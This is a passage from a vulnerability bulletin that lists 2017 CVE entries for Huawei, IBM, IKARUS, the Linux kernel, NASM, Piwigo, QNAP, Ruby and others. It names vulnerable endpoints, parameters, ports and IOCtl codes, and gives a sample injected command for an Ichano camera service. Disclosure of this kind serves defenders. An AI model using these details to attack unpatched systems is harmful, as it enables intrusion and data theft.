 		Huawei FusionSphere OpenStack V100R006C000SPC102 (NFV) has an information leak vulnerability due to the use of a low version transmission protocol by default. An attacker could intercept packets transferred by a target device. Successful exploit could cause an information leak.2017-12-22not yet calculatedCVE-2017-15321
CONFIRM
huawei -- hg8245h
 		Huawei HG8245H version earlier than V300R018C00SPC110 has an authentication bypass vulnerability. An attacker can access a specific URL of the affect product. Due to improper verification of the privilege, successful exploitation may cause information leak.2017-12-22not yet calculatedCVE-2017-15328
MISC
MISC
huawei -- honor_8_smartphone
 		Huawei Honor 8 smartphone with software versions earlier than FRD-L04C567B389 and earlier than FRD-L14C567B389 have a permission control vulnerability due to improper authorization configuration on specific device information.2017-12-22not yet calculatedCVE-2017-15307
CONFIRM
huawei -- ireader
 		Huawei iReader app before 8.0.2.301 has an arbitrary file deletion vulnerability due to the lack of input validation. An attacker can exploit this vulnerability to delete specific files from the SD card.2017-12-22not yet calculatedCVE-2017-15310
CONFIRM
huawei -- ireader
 		Huawei iReader app before 8.0.2.301 has a path traversal vulnerability due to insufficient validation on file storage paths. An attacker can exploit this vulnerability to store downloaded malicious files in an arbitrary directory.2017-12-22not yet calculatedCVE-2017-15309
CONFIRM
huawei -- ireader
 		Huawei iReader app before 8.0.2.301 has an input validation vulnerability due to insufficient validation on the URL used for loading network data. An attacker can control app access and load malicious websites created by the attacker, and the code in webpages would be loaded and run.2017-12-22not yet calculatedCVE-2017-15308
CONFIRM
huawei -- mate_9_smartphone
 		The GPU driver of Mate 9 Huawei smart phones with software before MHA-AL00B 8.0.0.334(C00) and Mate 9 Pro Huawei smart phones with software before LON-AL00B 8.0.0.334(C00) has a memory double free vulnerability. An attacker tricks a user into installing a malicious application, and the application can call special API, which triggers double free and causes a system crash or arbitrary code execution.2017-12-22not yet calculatedCVE-2017-15316
CONFIRM
huawei -- multiple_smartphones
 		Some Huawei smartphones with software of BGO-L03C158B003CUSTC158D001 and BGO-L03C331B009CUSTC331D001 have a DoS vulnerability due to insufficient input validation. An attacker could exploit this vulnerability by sending specially crafted NFC messages to the target device. Successful exploit could make a service crash.2017-12-22not yet calculatedCVE-2017-15322
CONFIRM
huawei -- multiple_products
 		The baseband modules of Mate 10, Mate 10 Pro, Mate 9, Mate 9 Pro Huawei smart phones with software before ALP-AL00 8.0.0.120(SP2C00), before BLA-AL00 8.0.0.120(SP2C00), before MHA-AL00B 8.0.0.334(C00), and before LON-AL00B 8.0.0.334(C00) have a stack overflow vulnerability due to the lack of parameter validation. An attacker could send malicious packets to the smart phones within radio range by special wireless device, which leads stack overflow when the baseband module handles these packets. The attacker could exploit this vulnerability to perform a denial of service attack or remote code execution in baseband module.2017-12-22not yet calculatedCVE-2017-15311
CONFIRM
huawei -- multiple_products
 		RP200 V500R002C00, V600R006C00; TE30 V100R001C10, V500R002C00, V600R006C00; TE40 V500R002C00, V600R006C00; TE50 V500R002C00, V600R006C00; TE60 V100R001C10, V500R002C00, V600R006C00 have an out-of-bounds read vulnerabilities in some Huawei products. Due to insufficient input validation, a remote attacker could exploit these vulnerabilities by sending specially crafted SS7 related packets to the target devices. Successful exploit will cause out-of-bounds read and possibly crash the system.2017-12-22not yet calculatedCVE-2017-15318
CONFIRM
huawei -- multiple_products
 		AR120-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR1200 V200R006C10, V200R006C13, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR1200-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR150 V200R006C10, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR150-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR160 V200R006C10, V200R006C12, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR200 V200R006C10, V200R007C00, V200R007C01, V200R008C20, V200R008C30; AR200-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR2200 V200R006C10, V200R006C13, V200R006C16, V200R007C00, V200R007C01, V200R007C02, V200R008C20, V200R008C30; AR2200-S V200R006C10, V200R007C00, V200R008C20, V200R008C30; AR3200 V200R006C10, V200R006C11, V200R007C00, V200R007C01, V200R007C02, V200R008C00, V200R008C10, V200R008C20, V200R008C30; AR510 V200R006C10, V200R006C12, V200R006C13, V200R006C15, V200R006C16, V200R006C17, V200R007C00, V200R008C20, V200R008C30; SRG1300 V200R006C10, V200R007C00, V200R007C02, V200R008C20, V200R008C30; SRG2300 V200R006C10, V200R007C00, V200R007C02, V200R008C20, V200R008C30; SRG3300 V200R006C10, V200R007C00, V200R008C20, V200R008C30 have an input validation vulnerability in Huawei multiple products. Due to the insufficient input validation, an unauthenticated, remote attacker may craft a malformed Stream Control Transmission Protocol (SCTP) packet and send it to the device, causing the device to read out of bounds and restart.2017-12-22not yet calculatedCVE-2017-15317
CONFIRM
huawei -- multiple_products
 		Huawei S12700 V200R006C00, V200R007C00, V200R007C01, V200R007C20, V200R008C00, V200R009C00, V200R010C00; S1700 V200R006C10, V200R009C00, V200R010C00; S2700 V200R006C00, V200R006C10, V200R007C00, V200R008C00, V200R009C00, V200R010C00, V200R011C00; S5700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, V200R010C00, V200R011C00; S6700 V200R005C00, V200R008C00, V200R009C00, V200R010C00; S7700 V200R006C00, V200R007C00, V200R008C00, V200R009C00, V200R010C0; S9700 V200R006C00, V200R007C00, V200R007C01, V200R008C00, V200R009C00, V200R010C00 have a DoS vulnerability due to insufficient validation of the Network Quality Analysis (NQA) packets. A remote attacker could exploit this vulnerability by sending malformed NQA packets to the target device. Successful exploitation could make the device restart.2017-12-22not yet calculatedCVE-2017-15324
CONFIRM
huawei -- multiple_products
 		RP200 V500R002C00, V600R006C00; TE30 V100R001C10, V500R002C00, V600R006C00; TE40 V500R002C00, V600R006C00; TE50 V500R002C00, V600R006C00; TE60 V100R001C10, V500R002C00, V600R006C00 have an out-of-bounds read vulnerabilities in some Huawei products. Due to insufficient input validation, a remote attacker could exploit these vulnerabilities by sending specially crafted SS7 related packets to the target devices. Successful exploit will cause out-of-bounds read and possibly crash the system.2017-12-22not yet calculatedCVE-2017-15319
CONFIRM
huawei -- multiple_products
 		RP200 V500R002C00, V600R006C00; TE30 V100R001C10, V500R002C00, V600R006C00; TE40 V500R002C00, V600R006C00; TE50 V500R002C00, V600R006C00; TE60 V100R001C10, V500R002C00, V600R006C00 have an out-of-bounds read vulnerabilities in some Huawei products. Due to insufficient input validation, a remote attacker could exploit these vulnerabilities by sending specially crafted SS7 related packets to the target devices. Successful exploit will cause out-of-bounds read and possibly crash the system.2017-12-22not yet calculatedCVE-2017-15320
CONFIRM
huawei -- smartcare
 		Huawei SmartCare V200R003C10 has a stored XSS (cross-site scripting) vulnerability in the dashboard module. A remote authenticated attacker could exploit this vulnerability to inject malicious scripts in the affected device.2017-12-22not yet calculatedCVE-2017-15312
CONFIRM
huawei -- smartcare

 		Huawei SmartCare V200R003C10 has a CSV injection vulnerability. An remote authenticated attacker could inject malicious CSV expression to the affected device.2017-12-22not yet calculatedCVE-2017-15313
CONFIRM
ibm -- business_process_manager
 		IBM Business Process Manager 8.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 128692.2017-12-20not yet calculatedCVE-2017-1494
CONFIRM
BID
MISC
ibm -- integration_bus
 		IBM Integration Bus 9.0 and 10.0 transmits user credentials in plain in clear text which can be read by an attacker using man in the middle techniques. IBM X-Force ID: 134165.2017-12-20not yet calculatedCVE-2017-1694
CONFIRM
MISC
ibm -- jazz_for_service_managmeent
 		IBM Jazz for Service Management (IBM Tivoli Components 1.1.3) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 133140.2017-12-20not yet calculatedCVE-2017-1631
CONFIRM
MISC
ibm -- jazz_for_service_managment
 		IBM Jazz for Service Management (IBM Tivoli Components 1.1.3) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 135519.2017-12-20not yet calculatedCVE-2017-1746
CONFIRM
MISC
ibm -- qradar
 		IBM QRadar 7.2 and 7.3 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 134178.2017-12-20not yet calculatedCVE-2017-1696
CONFIRM
MISC
ibm -- robotic_process_automation
 		IBM Robotic Process Automation with Automation Anywhere 10.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 135546.2017-12-20not yet calculatedCVE-2017-1751
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 135858.2017-12-20not yet calculatedCVE-2017-1757
CONFIRM
MISC
ibm -- websphere_portal
 		IBM WebSphere Portal 8.5 and 9.0 exposes backend server URLs that are configured for usage by the Web Application Bridge component. IBM X-Force ID: 127476.2017-12-20not yet calculatedCVE-2017-1423
SECTRACK
MISC
CONFIRM
ibm -- security_guardiumIBM Security Guardium 10.0 specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. IBM X-Force ID: 124741.2017-12-20not yet calculatedCVE-2017-1266
CONFIRM
MISC
ibm -- security_guardiumIBM Security Guardium 10.0 does not renew a session variable after a successful authentication which could lead to session fixation/hijacking vulnerability. This could force a user to utilize a cookie that may be known to an attacker. IBM X-Force ID: 124745.2017-12-20not yet calculatedCVE-2017-1270
CONFIRM
MISC
ibm -- security_guardiumIBM Security Guardium 10.0 Database Activity Monitor could allow a local attacker to obtain highly sensitive information via unspecified vectors. IBM X-Force ID: 132550.2017-12-20not yet calculatedCVE-2017-1596
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 Database Activity Monitor is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132613.2017-12-20not yet calculatedCVE-2017-1600
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 124736.2017-12-20not yet calculatedCVE-2017-1261
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 Database Activity Monitor uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 132611.2017-12-20not yet calculatedCVE-2017-1598
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. IBM X-Force ID: 124737.2017-12-20not yet calculatedCVE-2017-1262
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 Database Activity Monitor could allow a local attacker to obtain highly sensitive information via unspecified vectors. IBM X-Force ID: 132549.2017-12-20not yet calculatedCVE-2017-1595
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 10.0 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 124684.2017-12-20not yet calculatedCVE-2017-1257
CONFIRM
MISC
ichano -- athome_ip_camera_devices
 		An issue was discovered on Ichano AtHome IP Camera devices. The device runs the "noodles" binary - a service on port 1300 that allows a remote (LAN) unauthenticated user to run arbitrary commands. This binary requires the "system" XML element for specifying the command. For example, a <system>id</system> command results in a <system_ack>ok</system_ack> response.2017-12-19not yet calculatedCVE-2017-17761
MISC
ikarus -- ikarus

 		In IKARUS anti.virus 2.16.20, the driver file (ntguard.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x83000084.2017-12-20not yet calculatedCVE-2017-17804
MISC
ikarus -- ikarus
 		In IKARUS anti.virus 2.16.20, the driver file (ntguard.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x83000088.2017-12-20not yet calculatedCVE-2017-17795
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x830000c4, a related issue to CVE-2017-17113.2017-12-20not yet calculatedCVE-2017-14968
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x830000cc.2017-12-20not yet calculatedCVE-2017-14965
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x830000c0.2017-12-20not yet calculatedCVE-2017-14966
MISC
ikarus -- ikarus

 		In IKARUS anti.virus 2.16.20, the driver file (ntguard.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x83000058.2017-12-20not yet calculatedCVE-2017-17797
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x8300005c.2017-12-20not yet calculatedCVE-2017-14964
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x83000084, a related issue to CVE-2017-17114.2017-12-20not yet calculatedCVE-2017-14969
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Out of Bounds Write vulnerability because of not validating input values from IOCtl 0x83000058, a related issue to CVE-2017-17112.2017-12-20not yet calculatedCVE-2017-14962
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x83000080.2017-12-20not yet calculatedCVE-2017-14967
MISC
ikarus -- ikarus
 		In IKARUS anti.virus before 2.16.18, the ntguard.sys driver contains an Arbitrary Write vulnerability because of not validating input values from IOCtl 0x83000058.2017-12-20not yet calculatedCVE-2017-14963
MISC
jbpm_kie_workbench -- jbpm_kie_workbench
 		Multiple cross-site scripting (XSS) vulnerabilities in JBPM KIE Workbench 6.0.x allow remote authenticated users to inject arbitrary web script or HTML via vectors related to task name html inputs.2017-12-19not yet calculatedCVE-2013-6465
CONFIRM
CONFIRM
CONFIRM
kemp -- application_firewall_pack
 		The Application Firewall Pack (AFP, aka Web Application Firewall) component on Kemp Load Balancer devices with software before 7.2.40.1 allows a Security Feature Bypass via an HTTP POST request.2017-12-18not yet calculatedCVE-2017-15524
BUGTRAQ
CONFIRM
MISC
linux -- linux_kernel
 		The Salsa20 encryption algorithm in the Linux kernel before 4.14.8 does not correctly handle zero-length inputs, allowing a local attacker able to use the AF_ALG-based skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a denial of service (uninitialized-memory free and kernel crash) or have unspecified other impact by executing a crafted sequence of system calls that use the blkcipher_walk API. Both the generic implementation (crypto/salsa20_generic.c) and x86 implementation (arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.2017-12-20not yet calculatedCVE-2017-17805
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 		The HMAC implementation (crypto/hmac.c) in the Linux kernel before 4.14.8 does not validate that the underlying cryptographic hash algorithm is unkeyed, allowing a local attacker able to use the AF_ALG-based hash interface (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm (CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by executing a crafted sequence of system calls that encounter a missing SHA-3 initialization.2017-12-20not yet calculatedCVE-2017-17806
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 		The KEYS subsystem in the Linux kernel before 4.14.6 omitted an access-control check when adding a key to the current task's "default request-key keyring" via the request_key() system call, allowing a local user to use a sequence of crafted system calls to add keys to a keyring with only Search permission (not Write permission) to that keyring, related to construct_get_dest_keyring() in security/keys/request_key.c.2017-12-20not yet calculatedCVE-2017-17807
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 		The KVM implementation in the Linux kernel through 4.14.7 allows attackers to cause a denial of service (write_mmio stack-based out-of-bounds read) or possibly have unspecified other impact, related to arch/x86/kvm/x86.c and include/trace/events/kvm.h.2017-12-18not yet calculatedCVE-2017-17741
MISC
lyncsys -- wvbr0
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges. Was ZDI-CAN-4892.2017-12-21not yet calculatedCVE-2017-17411
MISC
maccms -- maccms 
 		Maccms 8.x allows remote command execution via the wd parameter in an index.php?m=vod-search request.2017-12-18not yet calculatedCVE-2017-17733
MISC
maplesoft -- maple_t.a.
 		A Reflected XSS Vulnerability affects the forgotten password page of Maplesoft Maple T.A. 2016.0.6 (Customer Hosted) via the emailAddress parameter to passwordreset/PasswordReset.do, aka Open Bug Bounty ID OBB-286688.2017-12-16not yet calculatedCVE-2017-14134
MISC
meinberg -- lantime
 		The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote attackers to read arbitrary files by leveraging failure to restrict URL access.2017-12-15not yet calculatedCVE-2017-16787
FULLDISC
EXPLOIT-DB
meinberg -- lantime
 		The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with certain privileges to read arbitrary files via (1) the ntpclientcounterlogfile parameter to cgi-bin/mainv2 or (2) vectors involving curl support of the "file" schema in the firmware update functionality.2017-12-19not yet calculatedCVE-2017-16786
MISC
FULLDISC
micro_focus -- operations_manager_i
 		Cross-Site Scripting (XSS) vulnerability has been identified in Micro Focus Operations Manager i, versions 10.60, 10.61, 10.62. The vulnerability could be remotely exploited to allow Cross-Site Scripting (XSS).2017-12-21not yet calculatedCVE-2017-14363
CONFIRM
moxa -- credentials_management
 		A Credentials Management issue was discovered in Moxa NPort W2150A versions prior to 1.11, and NPort W2250A versions prior to 1.11. The default password is empty on the device. An unauthorized user can access the device without a password. An unauthorized user has the ability to completely compromise the confidentiality and integrity of the wireless traffic.2017-12-21not yet calculatedCVE-2017-16727
BID
MISC
mt4_networks -- senhasegura
 		A Session Fixation Vulnerability exists in the MT4 Networks SenhaSegura Web Application 2.2.23.8 via login_if.php.2017-12-18not yet calculatedCVE-2017-11562
MISC
netapp -- clustered_data_ontap
 		NetApp Clustered Data ONTAP versions 9.x prior to 9.1P10 and 9.2P2 are susceptible to a vulnerability which allows an attacker to cause a Denial of Service (DoS) in SMB environments.2017-12-18not yet calculatedCVE-2017-14583
CONFIRM
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in the pp_list_one_macro function in asm/preproc.c that will cause a remote denial of service attack, related to mishandling of line-syntax errors.2017-12-20not yet calculatedCVE-2017-17813
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in pp_verror in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17817
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a heap-based buffer overflow that will cause a remote denial of service attack, related to a strcpy in paste_tokens in asm/preproc.c, a similar issue to CVE-2017-11111.2017-12-20not yet calculatedCVE-2017-17811
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a "SEGV on unknown address" that will cause a remote denial of service attack, because asm/preproc.c mishandles macro calls that have the wrong number of arguments.2017-12-20not yet calculatedCVE-2017-17810
MISC
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in pp_getline in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17816
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a heap-based buffer over-read in the function detoken() in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17812
MISC
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a heap-based buffer over-read that will cause a remote denial of service attack, related to a while loop in paste_tokens in asm/preproc.c.2017-12-20not yet calculatedCVE-2017-17818
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in pp_list_one_macro in asm/preproc.c that will lead to a remote denial of service attack, related to mishandling of operand-type errors.2017-12-20not yet calculatedCVE-2017-17820
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is an illegal address access in the function find_cc() in asm/preproc.c that will cause a remote denial of service attack, because pointers associated with skip_white_ calls are not validated.2017-12-20not yet calculatedCVE-2017-17819
MISC
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is a use-after-free in do_directive in asm/preproc.c that will cause a remote denial of service attack.2017-12-20not yet calculatedCVE-2017-17814
MISC
netwide_assembler -- netwide_assembler
 		In Netwide Assembler (NASM) 2.14rc0, there is an illegal address access in is_mmacro() in asm/preproc.c that will cause a remote denial of service attack, because of a missing check for the relationship between minimum and maximum parameter counts.2017-12-20not yet calculatedCVE-2017-17815
MISC
MISC
open_ticket_request_system -- open_ticket_request_system
 		Open Ticket Request System (OTRS) 4.0.x before 4.0.28, 5.0.x before 5.0.26, and 6.0.x before 6.0.3, when cookie support is disabled, might allow remote attackers to hijack web sessions and consequently gain privileges via a crafted email.2017-12-20not yet calculatedCVE-2017-17476
CONFIRM
CONFIRM
CONFIRM
CONFIRM
openldap -- openldap
 		contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.2017-12-18not yet calculatedCVE-2017-17740
MISC
phpscriptsmall.com -- paid_to_read_script
 		Paid To Read Script 2.0.5 has SQL injection via the referrals.php id parameter.2017-12-19not yet calculatedCVE-2017-17779
MISC
phpscriptsmall.com -- paid_to_read_script
 		Paid To Read Script 2.0.5 has SQL Injection via the admin/userview.php uid parameter, the admin/viewemcamp.php fnum parameter, or the admin/viewvisitcamp.php fn parameter.2017-12-18not yet calculatedCVE-2017-17651
MISC
EXPLOIT-DB
phpscriptsmall.com -- paid_to_read_script
 		Paid To Read Script 2.0.5 has XSS via the referrals.php tier parameter or the admin/userview.php uid parameter.2017-12-19not yet calculatedCVE-2017-17778
MISC
phpscriptsmall.com -- paid_to_read_script
 		Paid To Read Script 2.0.5 has authentication bypass in the admin panel via a direct request, as demonstrated by the admin/viewvisitcamp.php fn parameter and the admin/userview.php uid parameter.2017-12-19not yet calculatedCVE-2017-17777
MISC
phpscriptsmall.com -- paid_to_read_script
 		Paid To Read Script 2.0.5 has full path disclosure via an invalid admin/userview.php uid parameter.2017-12-19not yet calculatedCVE-2017-17776
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 		Readymade Video Sharing Script 3.2 has HTML Injection via the single-video-detail.php comment parameter.2017-12-18not yet calculatedCVE-2017-17649
MISC
EXPLOIT-DB
piwigo -- piwigo
 		Piwigo 2.9.2 is vulnerable to Cross-Site Request Forgery via /admin.php?page=configuration&section=main or /admin.php?page=batch_manager&mode=unit. An attacker can exploit this to coerce an admin user into performing unintended actions.2017-12-20not yet calculatedCVE-2017-17827
MISC
MISC
MISC
piwigo -- piwigo
 		The Configuration component of Piwigo 2.9.2 is vulnerable to Persistent Cross Site Scripting via the gallery_title parameter in an admin.php?page=configuration&section=main request. An attacker can exploit this to hijack a client's browser along with the data stored in it.2017-12-20not yet calculatedCVE-2017-17826
MISC
piwigo -- piwigo
 		The Batch Manager component of Piwigo 2.9.2 is vulnerable to Persistent Cross Site Scripting via tags-* array parameters in an admin.php?page=batch_manager&mode=unit request. An attacker can exploit this to hijack a client's browser along with the data stored in it.2017-12-20not yet calculatedCVE-2017-17825
MISC
piwigo -- piwigo
 		The Batch Manager component of Piwigo 2.9.2 is vulnerable to SQL Injection via the admin/batch_manager_unit.php element_ids parameter in unit mode. An attacker can exploit this to gain access to the data in a connected MySQL database.2017-12-20not yet calculatedCVE-2017-17824
MISC
MISC
MISC
piwigo -- piwigo
 		The Configuration component of Piwigo 2.9.2 is vulnerable to SQL Injection via the admin/configuration.php order_by array parameter. An attacker can exploit this to gain access to the data in a connected MySQL database.2017-12-20not yet calculatedCVE-2017-17823
MISC
MISC
MISC
piwigo -- piwigo
 		The List Users API of Piwigo 2.9.2 is vulnerable to SQL Injection via the /admin/user_list_backend.php sSortDir_0 parameter. An attacker can exploit this to gain access to the data in a connected MySQL database.2017-12-20not yet calculatedCVE-2017-17822
MISC
MISC
MISC
piwigo -- piwigo
 		Piwigo 2.9.2 has XSS via the name parameter in an admin.php?page=album-3-properties request.2017-12-19not yet calculatedCVE-2017-17775
MISC
piwigo -- piwigo
 		admin/configuration.php in Piwigo 2.9.2 has CSRF.2017-12-19not yet calculatedCVE-2017-17774
MISC
MISC
puppet -- puppet_enterprise
 		Puppet Enterprise 3.7.x and 3.8.0 might allow remote authenticated users to manage certificates for arbitrary nodes by leveraging a client certificate trusted by the master, aka a "Certificate Authority Reverse Proxy Vulnerability."2017-12-21not yet calculatedCVE-2015-4100
CONFIRM
puppet -- puppetlabs-mysql
 		puppetlabs-mysql 3.1.0 through 3.6.0 allow remote attackers to bypass authentication by leveraging creation of a database account without a password when a 'mysql_user' user parameter contains a host with a netmask.2017-12-21not yet calculatedCVE-2015-7224
CONFIRM
qnap -- qtsA buffer overflow vulnerability in password function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17031
CONFIRM
qnap -- qts
 		A buffer overflow vulnerability in password function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17033
CONFIRM
qnap -- qts
 		A buffer overflow vulnerability in login function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17030
CONFIRM
qnap -- qts
 		A buffer overflow vulnerability in external device function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17028
CONFIRM
qnap -- qts
 		A buffer overflow vulnerability in FTP service in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17027
CONFIRM
qnap -- qts
 		A buffer overflow vulnerability in password function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17032
CONFIRM
qnap -- qts
 		A buffer overflow vulnerability in login function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17029
CONFIRM
rados -- gateway
 		RADOS Gateway in Ceph 12.1.0 through 12.2.1 allows remote authenticated users to cause a denial of service (assertion failure and application exit) by leveraging "full" (not necessarily admin) privileges to post an invalid profile to the admin API, related to rgw/rgw_iam_policy.cc, rgw/rgw_basic_types.h, and rgw/rgw_iam_types.h.2017-12-20not yet calculatedCVE-2017-16818
CONFIRM
CONFIRM
FEDORA
rockwell_automation -- factorytalk_alarms_and_events
 		An Improper Input Validation issue was discovered in Rockwell Automation FactoryTalk Alarms and Events, Version 2.90 and earlier. An unauthenticated attacker with remote access to a network with FactoryTalk Alarms and Events can send a specially crafted set of packets packet to Port 403/TCP (the history archiver service), causing the service to either stall or terminate.2017-12-22not yet calculatedCVE-2017-14022
BID
MISC
ruby -- ruby
 		Ruby before 2.4.3 allows Net::FTP command injection. Net::FTP#get, getbinaryfile, gettextfile, put, putbinaryfile, and puttextfile use Kernel#open to open a local file. If the localfile argument starts with the "|" pipe character, the command following the pipe character is executed. The default value of localfile is File.basename(remotefile), so malicious FTP servers could cause arbitrary command execution.2017-12-15not yet calculatedCVE-2017-17405
BID
CONFIRM
CONFIRM
ruby -- ruby
 		The Net::LDAP (aka net-ldap) gem before 0.16.0 for Ruby has Missing SSL Certificate Validation.2017-12-17not yet calculatedCVE-2017-17718
MISC
MISC
MISC
ruby -- ruby
 		The lazy_initialize function in lib/resolv.rb in Ruby through 2.4.3 uses Kernel#open, which might allow Command Injection attacks, as demonstrated by a Resolv::Hosts::new argument beginning with a '|' character, a different vulnerability than CVE-2017-17405. NOTE: situations with untrusted input may be highly unlikely.2017-12-20not yet calculatedCVE-2017-17790
CONFIRM
samsung -- internet_browser
